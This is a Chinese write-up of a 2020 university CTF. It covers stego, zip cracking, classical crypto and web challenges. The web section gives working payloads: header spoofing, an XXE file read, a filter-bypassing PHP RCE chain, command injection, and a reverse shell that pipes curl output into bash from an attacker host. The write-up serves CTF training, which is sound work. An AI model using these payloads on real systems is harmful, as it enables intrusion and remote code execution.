0%

第三届海啸杯 2020

记一次广航校内的比赛,本次作为出题人,虽然只出了一道题

misc

表白

PNG高度隐藏

image-20201119115739801

LSB

基于 LSB 原理图片隐写

使用 Stegsolve 的 Data Extract 分析,下载地址:https://share.weiyun.com/z9PBJjks

加载图片,并 Data Extract 分析

这里就分析出来一个 png 的文件。点击下方 save bin 保存为 png 文件即可。

扫描二维码即可获得flag。

老烟枪

直接丢kali,binwalk分离

最后得到一个倒过来的flag,将其颠倒得到正确的flag

你能破解吗

  • hint:压缩包密码为g2mtu加四位数字

这里可以使用ARCHPR压缩包破解软件

首先用遍历所有的密码,然后保存在1.txt字典里面

遍历脚本

1
2
3
4
5
f = open('1.txt','w')
for i in range(1000,9999):
a = 'g2mtu'+str(i)+'\n'
f.write(a)
f.close()

然后打开软件选择字典模式

image-20201119120006028

image-20201119120028376

解开压缩包再base64解密即可获得flag。

disk0

挂载命令如下

1
mount disk0 存放的文件夹

image-20201119120750180

一个文本文件,和一个加密过的zip,文本说密码被删除了,使用取证工具extundelete恢复一下disk0

1
extundelete disk0 --restore-all

image-20201119120947921

得到一个RECOVERED_FILES文件夹,里面file文件就是zip的密码

解压再修改一下图片高度即可得到flag

Crypto

凯撒将军

凯撒密码

加密算法:将给定的flag中的每个字符后移3位,并将偏移后的字符串base64编码

加密脚本

1
2
3
4
5
6
7
8
9
10
11
12
flag = "flag{crypto_is_hxb_so_eAsy0}"

result = flag.encode("base64")

print result

encode_flag = ""

for i in result:
encode_flag += chr((ord(i)+3)%128)

print encode_flag

解密脚本:

1
2
3
4
5
6
7
8
result="]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@"

flag=""

for i in result:
flag += chr(ord(i)-3)

print flag.decode("base64")

小明家的小菜园

栅栏密码

由于栅栏数较小,因此不给出栅栏数提示,可以用网上的栅栏密码解密或手写脚本爆破栅栏数解密

加密脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
flag = "flag{yo_uget_itzha_lan_good}"

#flag{yo _uget_i tzha_la n_good}

k = 7

flag {yo_ uget _itz ha_l an_g ood}

f_tn

encode_flag=""



for i in range(7):
for j in range(4):
encode_flag += flag[j*7+i]

print encode_flag

​ 解密脚本:

1
2
3
4
5
6
7
8
9
10
encode_flag = "f_tnluz_aghggeao{t_oy_ldoia}"

for k in range(1,29):
flag=""
num = 28/k
for i in range(k):
for j in range(num):
flag += encode_flag[j*k+i]
if "flag" in flag:
print "k:"+str(28/k)+"\n"+"flag:\n"+flag+"\n"

战报

描述:

我军成功捣毁敌军秘密电台缴获密文和明文一份,但是还有一份密文难以破解特请你来破译密码:

1
2
3
4
密文:
jivsyisgmlirgbggvuocevsivnsoevszotfloymivnmozwgitmbyfevtgugvffecgmflgtglimbggvjgmmuocevsivnijofcotgsoevsklgvflgkotjnkimmfejjhohyjifgnbwlyvfgtsiflgtgtmmcijjfeslfjwqvefstoyhmngrgjohgnflgetokvhiffgtvmozmhggulevnghgvngvfozgiuloflgtmocgjivsyisggdhgtfmbgjegrgflifwgitmisoklgvflgkotjnlinxymfzergfofgvcejjeovhgohjgflgwmhoqghgtlihmjivsyisgmbgfkggvflgcmoovizfgtkitnmcivwozflomghgohjgmfitfgnmgffjevsnokvfobguocgzitcgtmivnflgetjivsyisgmfoobguicgcotgmgffjgnivnzgkgtevvycbgtevtgugvfugvfytegmftingevnymfteijemifeovflgngrgjohcgvfozflgvifeovmfifgivnflgmhtginozyvergtmijuochyjmotwgnyuifeovgmhgueijjwsjobijemifeovivnbgffgtuoccyveuifeovmevflghimfzgknguingmijjlirguiymgncivwjivsyisgmfonemihhgitivnnocevivfjivsyisgmmyulimgvsjemlmhivemlivnulevgmgitgevutgimevsjwfiqevsorgtifhtgmgvfflgkotjnlimiboyfjivsyisgmflgnemftebyfeovozflgmgjivsyisgmemlysgjwyvgrgvflgsgvgtijtyjgemflifcejnpovgmlirgtgjifergjwzgkjivsyisgmozfgvmhoqgvbwcivwhgohjgklejglofkgfpovgmlirgjofmozfgvmhoqgvbwmcijjvycbgtmgytohglimovjwitoyvnjivsyisgmflgicgteuimiboyfizteuiivnimeiivnflghiuezeuhgtlihmozkleulhihyivgksyevgiijovgiuuoyvfmzotkgjjorgtflgcgneivvycbgtozmhgiqgtmemcgtgkleulfliflijzflgkotjnmjivsyisgmitgmhoqgvbwzgkgthgohjgflivflifijtginwkgjjorgtozflgfofijozjivsyisgmitgujomgfogdfevufeovkeflovjwizgkgjngtjwmhgiqgtmjgzfheuqiftivnocbymyyevuicgtoovgeslftgcievevsmhgiqgtmuleihivguoevcgdeuojehivihiulgevflgyvefgnmfifgmfkootfltggotkinxesyeviymftijeiovgkefliaygmfeovcitqvovgozflgmgmggcmfolirgcyululivugozmytrerij
明文:
Languages have been coming and going for thousands of years, but in recent times there has been less coming and a lot more going. When the world was still populated by hunter-gatherers,small,tightly knit(联系)groups developed their own patterns of speech independent of each other. Some language experts believe that 10,000 years ago, when the world had just five to ten million people, they spoke perhaps 12, 000 languages between them.Soon afterwards, many of those people started settling down to become farmers, and their languages too became more settled and fewer in number. In recent centuries, trade, industrialisation, the development of the nation-state and the spread of universal compulsory education, especially globalisation and better communications in the past few decades, all have caused many languages to disappear, and dominant languages such as English,Spanish and Chinese are increasingly taking over.At present, the world has about 6, 800 languages. The distribution of these languages is hugely uneven. The general rule is that mild zones have relatively few languages, often spoken by many people, while hot wet zones have lots, often spoken by small numbers. Europe has only around 200 languages; the Americas about 1, 000; Africa 2, 400; and Asia and the Pacific perhaps 3,200, of which Papua New Guinea alone accounts for well over 800.The median number(中位数) of speakers is mere 6,000, which that half the world's languages are spoken by fewer people than that.Already well over 400 of the total of 6, 800 languages are close to extinction (消亡), with only a few elderly speakers left. Pick, at random, Busuu in Cameroon (eight remaining speakers), Chiapaneco in Mexico (150), Lipan Apache in the United States (two or three) or Wadjigu in Australia (one, with a question-mark): none of these seems to have much chance of survival

待解密文:

1
givfome

解题过程

进行字频统计得出如下结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
e =>g
a =>i
n =>v
t =>f
o =>o
s =>m
i =>e
r =>j
l =>t
h =>l
u =>y
d =>s
g =>h
p =>n
c =>u
m =>c
f =>z
w =>k
y =>b
v =>w
k =>r
c =>q
p =>d
t =>p
x =>x
j =a
  • 加密脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
table = ['p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o']
s = "eantosi"
m = ""
for i in s:
k=0
for j in table:
i = i.lower()
if j == i:
l =(19*k+18)%26
m = m + table[l]
break
else:
k = k+1
print(m)

flag

1
flag{eantosi}

web

G2mtu学生?

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
<?php
setcookie("user", "0", time()+360);
if(@$_SERVER["HTTP_X_FORWARDED_FOR"]!="127.0.0.1"){
die("u no student in Gzmtu");
}else{
if($_COOKIE['user']==1){
echo "flag{welcom_to_GZMTU_56456s4awdawdafafa}";
}else{
die("u no admin!");
}
}
?>

xff伪造ip为127.0.0.1然后改cookie未授权访问即可获取到flag

Who are you?

考点

  • XXE外部实体注入

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<?php
libxml_disable_entity_loader(false);
$data = @file_get_contents('php://input');
$resp = '';
//$flag='flag{79d10626-d27f-4569-a629-c9606d0378f2}';
if($data != false){
$dom = new DOMDocument();
$dom->loadXML($data, LIBXML_NOENT);
ob_start();
$res = $dom->textContent;
$resp = ob_get_contents();
ob_end_clean();
if ($res){
die($res);
}

}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>welcome</title>
<link rel="stylesheet" href="./style.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

</head>
<body class="contactBody">
<div class="wrapper">
<div class="title">


</div>


<form method="post" class="form">
<h1 id="title">请输入姓名</h1>
<br/>
<br/>
<br/>
<input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
</form>
<button class="submit entry" onclick="func()">Submit</button>

<div class="shadow"></div>
</div>

</body>
</html>
<script type="text/javascript">
function play() {
return false;
}
function func() {
// document.getElementById().value
var xml = '' +
'<\?xml version="1.0" encoding="UTF-8"\?>' +
'<feedback>' +
'<author>' + document.getElementById('name').value+ '</author>' +
'</feedback>';
console.log(xml);
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
// console.log(xmlhttp.readyState);
// console.log(xmlhttp.responseText);
var res = xmlhttp.responseText;
document.getElementById('title').textContent = res
}
};
xmlhttp.open("POST", "index.php", true);
xmlhttp.send(xml);
return false;
};
</script>
</body>
</html>

解题思路

xxe外部实体注入+伪协议读取源码

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>

<feedback>
<author>&xxe;</author>
</feedback>

抓包改一下,再base64解密即可得到flag

无参数RCE

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
//flag in flag.php
$a="";
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
if(preg_match("/ses|pos|end|next|name|chdir|var|impolode|tan|tall|sys|eval|var|high|show|read|base|url|print/", $_GET['code'])){
die("no no no !");
}
eval("\$a=".$_GET['code']);
if(preg_match('/flag/', $a)){
die("no");
}
echo($a);
} else {
show_source(__FILE__);
}
?>

过滤诸多,将常用的数组控制函数给ban了,session也ban了,文件显示的show_souce以及highlight_file也没了,能用的函数查阅完,最终有个控制数组的随机数函数array_rand以及文件file_get_contents,选择当前目录的函数有个current组合起来就行了

1
file_get_contents(array_rand(array_flip(scandir(current(localeconv())))));

但是后边又过滤了flag,而flag在flag.php,读到就会die掉,所以需要加密,常用的加密base64已经被过滤了,选择使用十六进制加密,最终payload:

1
bin2hex(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));

读取的时候有些文件也会被读取进来,因为是随机读取,每次出现不一样的十六进制,都需要多解密看看,解密代码

1
2
<?php
echo hex2bin("3c3f7068700d0a2f2f666c61677b31353166306361642d376338322d346164312d383230332d3536636333366461393564307d0d0a3f3e");

解开得flag

神奇的输入框

这道题是一道无回显的ping命令

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
if( isset( $_POST['submit'] ) ) {
// Get input
$target = $_REQUEST['site'];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
}
?>
  • 解法一

利用>把我们需要执行的命令写入文件里面

1
127.0.0.1|ls > 1.txt

访问1.txt然后看到flagggg.php

1
127.0.0.1|cat flagggg.php> 1.txt

或者反引号执行命令

1
`cat flagggg.php> 1.txt`

即可得到flag

  • 解法二

直接反弹一个shell

在vps监听1234端口

1
nc -lvp 1234

在vps的/var/www/html写入bash反弹语句

1
bash -i >& /dev/tcp/ip/1234 0>&1

然后回到输入框下输入

1
|curl ip|bash

image-20201119120730923

tips:因为docker靶机的环境问题可能无法写shell,以及无法使用dnslog外带数据。

CMS

弱口令admin/admin8888登录后台

  • 解法一

文件包含漏洞

image-20201119132632586

插入php代码

image-20201119132855855

改一下页面

image-20201119133034032

然后点击前台的关于我们

image-20201119133206501

点进去即可获得flag

  • 其他解法

百度xiaocms漏洞,有现成的getshell方法